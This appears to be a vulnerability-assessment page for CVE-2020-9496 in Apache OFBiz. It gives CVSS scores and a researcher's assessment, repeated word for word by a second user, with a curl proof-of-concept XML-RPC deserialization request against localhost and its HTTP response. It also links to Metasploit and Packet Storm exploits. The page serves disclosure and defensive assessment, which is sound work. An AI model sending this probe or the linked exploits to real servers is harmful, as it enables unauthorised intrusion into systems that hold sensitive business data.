9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03
Recent assessments:
wvu-r7 at August 13, 2020 8:00pm UTC reported:
Pre-auth RCE in ERP software that’s free and isn’t SAP? Sweet. And it’s a long-standing Apache project that’s often recommended. Here’s a PoC:
wvu@kharak:~$ curl -vH "Content-Type: text/xml" http://127.0.0.1:8080/webtools/control/xmlrpc -d '<?xml version="1.0"?><methodCall><methodName>foo</methodName><params><param><value><struct><member><name>bar</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions"></serializable></value></member></struct></value></param></params></methodCall>'
* Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> POST /webtools/control/xmlrpc HTTP/1.1
> Host: 127.0.0.1:8080
> User-Agent: curl/7.64.1
> Accept: */*
> Content-Type: text/xml
> Content-Length: 273
>
* upload completely sent off: 273 out of 273 bytes
< HTTP/1.1 200 OK
< Server: Apache-Coyote/1.1
< Set-Cookie: JSESSIONID=D090A373F50D50CF8CFCF2F9E301D04A.jvm1; Path=/webtools/; Secure; HttpOnly
< Set-Cookie: OFBiz.Visitor=10221; Expires=Fri, 13-Aug-2021 19:57:20 GMT; Path=/
< Content-Type: text/xml;charset=UTF-8
< Transfer-Encoding: chunked
< Vary: Accept-Encoding
< Date: Thu, 13 Aug 2020 19:57:20 GMT
<
* Connection #0 to host 127.0.0.1 left intact
<?xml version="1.0" encoding="UTF-8"?><methodResponse xmlns:ex="http://ws.apache.org/xmlrpc/namespaces/extensions"><fault><value><struct><member><name>faultCode</name><value><i4>0</i4></value></member><member><name>faultString</name><value>Failed to read result object: null</value></member></struct></value></fault></methodResponse>* Closing connection 0
wvu@kharak:~$
A lot of orgs rely on ERP software, and you’re bound to find sensitive information in an ERP system. Note that these systems will likely be inside the network perimeter. High value for pentesters on an internal, I’d say.
Note that the CVE seems to conflate this with XSS. CVSS score seems lower than I’d expect.
ETA: Here’s an exploit: <https://github.com/rapid7/metasploit-framework/pull/14000>.
pbarry-r7 at August 24, 2020 3:13am UTC reported:
Pre-auth RCE in ERP software that’s free and isn’t SAP? Sweet. And it’s a long-standing Apache project that’s often recommended. Here’s a PoC:
wvu@kharak:~$ curl -vH "Content-Type: text/xml" http://127.0.0.1:8080/webtools/control/xmlrpc -d '<?xml version="1.0"?><methodCall><methodName>foo</methodName><params><param><value><struct><member><name>bar</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions"></serializable></value></member></struct></value></param></params></methodCall>'
* Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> POST /webtools/control/xmlrpc HTTP/1.1
> Host: 127.0.0.1:8080
> User-Agent: curl/7.64.1
> Accept: */*
> Content-Type: text/xml
> Content-Length: 273
>
* upload completely sent off: 273 out of 273 bytes
< HTTP/1.1 200 OK
< Server: Apache-Coyote/1.1
< Set-Cookie: JSESSIONID=D090A373F50D50CF8CFCF2F9E301D04A.jvm1; Path=/webtools/; Secure; HttpOnly
< Set-Cookie: OFBiz.Visitor=10221; Expires=Fri, 13-Aug-2021 19:57:20 GMT; Path=/
< Content-Type: text/xml;charset=UTF-8
< Transfer-Encoding: chunked
< Vary: Accept-Encoding
< Date: Thu, 13 Aug 2020 19:57:20 GMT
<
* Connection #0 to host 127.0.0.1 left intact
<?xml version="1.0" encoding="UTF-8"?><methodResponse xmlns:ex="http://ws.apache.org/xmlrpc/namespaces/extensions"><fault><value><struct><member><name>faultCode</name><value><i4>0</i4></value></member><member><name>faultString</name><value>Failed to read result object: null</value></member></struct></value></fault></methodResponse>* Closing connection 0
wvu@kharak:~$
A lot of orgs rely on ERP software, and you’re bound to find sensitive information in an ERP system. Note that these systems will likely be inside the network perimeter. High value for pentesters on an internal, I’d say.
Note that the CVE seems to conflate this with XSS. CVSS score seems lower than I’d expect.
ETA: Here’s an exploit: <https://github.com/rapid7/metasploit-framework/pull/14000>.
Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 5
packetstormsecurity.com/files/158887/Apache-OFBiz-XML-RPC-Java-Deserialization.html
packetstormsecurity.com/files/161769/Apache-OFBiz-XML-RPC-Java-Deserialization.html
packetstormsecurity.com/files/163730/Apache-OfBiz-17.12.01-Remote-Command-Execution.html
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9496
lists.apache.org/thread.html/r0a0a701610b3bcdf14634047313adab3f1628bb9aa55cf29cd262ef5@%3Ccommits.ofbiz.apache.org%3E
lists.apache.org/thread.html/r108a964764b8bd21ebd32ccd4f51c183ee80a251c105b849154a8e9d@%3Ccommits.ofbiz.apache.org%3E
lists.apache.org/thread.html/r8fb319dc1f196563955fbf5e9cf454fb9d6c27c2058066445af7f8cb@%3Cuser.ofbiz.apache.org%3E
lists.apache.org/thread.html/ra43cfe80226c3b23cd775f3543da10c035ad9c9943cfe8a680490730@%3Cuser.ofbiz.apache.org%3E
lists.apache.org/thread.html/raf6020f765f12711e817ce13df63ecd7d677eebea8001e0473ee7c84@%3Cannounce.apache.org%3E
lists.apache.org/thread.html/rde93e1c91620335b72b798f78ab4459d3f7b06f96031d8ce86a18825@%3Cnotifications.ofbiz.apache.org%3E
s.apache.org/l0994
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P